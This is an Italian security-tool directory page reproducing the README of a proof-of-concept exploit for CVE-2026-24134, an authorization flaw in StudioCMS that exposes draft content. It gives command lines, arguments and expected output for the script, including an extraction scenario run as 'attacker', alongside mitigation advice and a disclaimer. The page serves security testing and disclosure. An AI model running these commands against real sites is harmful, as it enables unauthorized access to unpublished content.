Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/filipegaudard/cve-2026-24134-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebTest di Sicurezza delle APIPenetration TestingApprendimento e Formazione
GitHubfilipegaudard/cve-2026-24134-poc

CVE-2026-24134-PoC

Proof-of-concept exploit per CVE-2026-24134, una vulnerabilità Broken Object Level Authorization in StudioCMS, che dimostra l'accesso non autorizzato ai contenuti in bozza.

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-24134-PoC

Panoramica

Questo repository contiene la Proof of Concept (PoC) per CVE-2026-24134, una vulnerabilità di Broken Object Level Authorization (BOLA) in StudioCMS.

Contenuti

  • cve_2026_24134_poc.py - Script di sfruttamento in Python

Prerequisiti

  • StudioCMS<=0.1.1
root@kitploit:~
pip install requests colorama

Avvio Rapido

Sfruttamento Manuale

root@kitploit:~
# Utilizzo di base
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

# Salva l'output in un file
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --username visitor_user \
  --password visitor_pass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
  --save

Test Automatico

root@kitploit:~
python3 cve_2026_24134_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --editor-user editor01 \
  --editor-pass editorpass \
  --uuid bad87630-69a4-4cd6-bcb2-6965839dc148

Argomenti

Obbligatori

  • -u, --url - URL di base di StudioCMS di destinazione
  • --uuid - UUID del contenuto bozza di destinazione

Modalità Manuale

  • --username - Nome utente per l'autenticazione
  • --password - Password per l'autenticazione

Modalità Test Automatico

  • --auto-test - Abilita il test automatico
  • --visitor-user - Nome utente dell'account visitatore
  • --visitor-pass - Password dell'account visitatore
  • --editor-user - Nome utente dell'account editor
  • --editor-pass - Password dell'account editor

Opzionali

  • --save - Salva il contenuto della risposta in un file
  • --no-ssl-verify - Disabilita la verifica del certificato SSL

Scenari di Esempio

Scenario 1: Verifica se il sistema è vulnerabile

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://target.com \
  --auto-test \
  --visitor-user test_visitor \
  --visitor-pass SecurePass123! \
  --editor-user test_editor \
  --editor-pass SecurePass456! \
  --uuid 12345678-1234-1234-1234-123456789abc

Output previsto se vulnerabile:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!

Output previsto se corretto:

root@kitploit:~
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT

Scenario 2: Estrazione del contenuto bozza

root@kitploit:~
python3 cve_2026_24134_poc.py \
  --url http://localhost:4321 \
  --username attacker \
  --password pass123 \
  --uuid target-uuid-here \
  --save

Questo salverà l'intero contenuto bozza in draft_{uuid}.html.

Comprensione dell'Output

Indicatori di Successo

  • [+] - Operazione riuscita (verde)
  • [*] - Messaggio informativo (blu)
  • [!] - Avviso (giallo)
  • [-] - Errore (rosso)

Codici di Stato HTTP

  • 200 OK - Vulnerabile! Contenuto bozza accessibile
  • 403 Forbidden - Corretto! Autorizzazione adeguata in atto
  • 404 Not Found - UUID non valido o implementazione sicura (restituisce 404 invece di rivelare l'esistenza)
  • 401 Unauthorized - Autenticazione fallita

Mitigazione

Se stai eseguendo una versione vulnerabile di StudioCMS, aggiorna immediatamente alla versione corretta.

Per Sviluppatori

Il Problema Reale: I controlli di autorizzazione venivano eseguiti lato client (JavaScript), non lato server.

Secondo il team di sviluppo:

"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."

La Soluzione: Spostare l'autorizzazione dal client al server.

Principio Chiave: Non fidarti mai del client. La sicurezza lato client = miglioramento dell'esperienza utente. La sicurezza lato server = protezione reale.

Disclaimer Legale

IMPORTANTE: Questo strumento è fornito esclusivamente per scopi educativi e di test di sicurezza autorizzati.

  • Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta
  • L'accesso non autorizzato a sistemi informatici è illegale nella maggior parte delle giurisdizioni
  • L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento
  • Segui sempre le pratiche di divulgazione responsabile

Riferimenti

  • CVE: CVE-2026-24134
  • CVSS: 6.5 High
  • CWE: CWE-639
  • OWASP: API1:2023 - Broken Object Level Authorization

Contatti

Per domande su questa PoC o sulla vulnerabilità:

  • Autore: Filipe Gaudard

Licenza

Questa PoC è rilasciata per scopi educativi. Usala in modo responsabile ed etico.

Scarica lo strumento